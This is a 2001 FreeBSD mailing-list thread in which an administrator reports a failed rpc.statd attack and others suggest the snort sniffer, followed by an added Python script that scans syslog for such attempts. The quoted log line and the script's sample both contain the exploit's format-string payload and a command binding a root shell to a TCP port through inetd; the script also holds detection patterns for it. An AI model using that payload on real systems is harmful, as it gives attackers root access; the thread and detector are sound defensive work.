Date: Thu, 4 Jan 2001 09:52:45 -0600 (CST)
From: Guy Helmer <ghelmer@palisadesys.com>
To: Raymond Hicks <rayhicks@UU.NET>
Cc: Eric_Stanfield@kenokozie.com, freebsd-questions@FreeBSD.ORG
Subject: RE: hack attempt (again) - help
Message-ID: <Pine.LNX.4.21.0101040951330.10523-100000@magellan.palisadesys.com>
In-Reply-To: <003801c07665$c5b4d170$d7902799@sysenglt112>
On Thu, 4 Jan 2001, Raymond Hicks wrote:

> why don't you just run a sniffer? snort is a sniffer with a lot of good
> stuff (TM) to find evil things.
>
> -----Original Message-----
> From: owner-freebsd-questions@FreeBSD.ORG
> [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Guy Helmer
> Sent: Thursday, January 04, 2001 10:26 AM
> To: Eric_Stanfield@kenokozie.com
> Cc: freebsd-questions@FreeBSD.ORG
> Subject: Re: hack attempt (again) - help
>
>
> On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:
>
> > Alright this jerkoff has once again attempted to hack one of my freebsd
> > machines by trying what I assume is a buffer overflow to rpc:
> >
> > Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> > ^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7=FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x
> > %08x %08x %08x %08x %08x %08x %08x
> > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^P=EBK^M-
> > v=ACM-^C=EE M-^M^(M-^C=C6 M- ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C=EB#M- ^=B41=C0M-^C=EE
> > M-^HF'M-^HF*M-^C=C6 M-^HF=ABM- F=B8=B0+, M- =F3M-^MN=ACM-^MV=B8=CD M-^@1=DBM-
> > =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >>
> > /tmp/m; /usr/sbin/inetd /tmp/m;
> >
> > The interesting bit is what he (she?) is attempting to sneak in at the end
> > of the garbage sent to the port.
> >
> > I've given the system a thorough check and this seems to have been a second
> > failed attempt. I'm now annoyed, however, and would like to be able to at
> > least log what address this stuff is originating from. Can anyone suggest
> > something from the ports that would do the trick? I've disabled nfs/rpc
> > but I'm sure the hacker will come knocking again.
>
> snort with a current copy of the rule set from
> http://www.whitehats.com/ids/index.html ought to detect this (and lots of
> other script kiddie attempts).

--
Guy Helmer, Ph.D. Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.com
http://www.palisadesys.com/~ghelmer

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
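The question in the thread is what to run so that the next attempt is at least logged with its source address, and the answer is a network sniffer. The syslog entry quoted above carries no peer address at all, only the bogus "hostname" that rpc.statd rejected, so host-side log review can triage such entries but cannot attribute them; that is the gap a sensor like the snort setup mentioned fills. As an added example that is not part of the thread, here is a small Python triage script that parses BSD-style syslog lines, picks out rpc.statd "Invalid hostname to sm_mon" entries and flags the properties that mark the quoted one as a format-string exploit attempt rather than a merely malformed hostname. The log lines are constructed (the second one mimics the shape of the quoted entry), and the indicator names and regular expressions are my own rather than anything from a snort rule set.

```python
import re

# Constructed sample syslog lines (not taken from the thread). The second line
# mimics the shape of the rpc.statd entry quoted in the message; non-printable
# bytes are written as \xNN text so the sample stays readable.
SAMPLE_LOG = """\
Jan  3 23:19:20 mrtg sshd[412]: Accepted publickey for ops from 192.0.2.10 port 51514 ssh2
Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: ^D\\xf7\\xff\\xbf^D\\xf7\\xff\\xbf%08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%n\\x90\\x90\\x90/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;
Jan  3 23:20:01 mrtg cron[500]: (root) CMD (/usr/libexec/atrun)
Jan  3 23:21:07 mrtg rpc.statd: Invalid hostname to sm_mon: bad..host..name
"""

# Classic BSD syslog line: timestamp, host, program[pid]: message
SYSLOG_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\s'
    r'(?P<prog>[^:\[\s]+)(?:\[\d+\])?:\s(?P<msg>.*)$'
)

STATD_MARKER = "Invalid hostname to sm_mon:"

# Each indicator names one property of the rejected "hostname" that no real
# hostname has. Names and patterns are this example's own (hypothetical).
INDICATORS = [
    # %n makes printf write a byte count into memory; it is the write primitive
    # of a format-string attack and never appears in a legitimate hostname.
    ("printf_write_directive", re.compile(r'%\d*n')),
    # long runs of %x are used to walk up the stack before the %n writes
    ("stack_read_directives", re.compile(r'(?:%\d*x\s*){4,}')),
    # a shell or inetd invocation is the intended post-exploitation payload
    ("shell_command", re.compile(r'/bin/sh|/usr/sbin/inetd')),
    # an inetd.conf entry binding a root shell to a TCP port
    ("inetd_root_shell_line", re.compile(r'\d+\s+stream\s+tcp\s+nowait\s+root')),
]


def parse_syslog(line):
    """Split one syslog line into its fields, or return None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def classify_statd_message(msg):
    """Return the indicator names that fire on an rpc.statd message.

    An empty list means the message is either not an sm_mon complaint or the
    offending hostname looks like ordinary garbage rather than an exploit.
    """
    if STATD_MARKER not in msg:
        return []
    payload = msg.split(STATD_MARKER, 1)[1]
    return [name for name, rx in INDICATORS if rx.search(payload)]


def scan_log(text):
    """Return one alert dict per rpc.statd line that carries exploit indicators."""
    alerts = []
    for line in text.splitlines():
        rec = parse_syslog(line)
        if rec is None or rec["prog"] != "rpc.statd":
            continue
        hits = classify_statd_message(rec["msg"])
        if hits:
            alerts.append({"ts": rec["ts"], "host": rec["host"], "indicators": hits})
    return alerts


if __name__ == "__main__":
    # Note what is missing from every alert: a source address. Attribution
    # needs a network-level sensor, which is why the thread points at snort.
    for a in scan_log(SAMPLE_LOG):
        print(f'{a["ts"]} {a["host"]}: rpc.statd format-string attempt ({", ".join(a["indicators"])})')
```

Run against the constructed sample, only the second line produces an alert; the fourth line, a genuinely malformed hostname, is left alone because none of the indicators fire on it. The script is deliberately narrow (one daemon, one log message) so that it does not page on every odd hostname in the log; broaden the indicator list only with patterns that cannot occur in legitimate input.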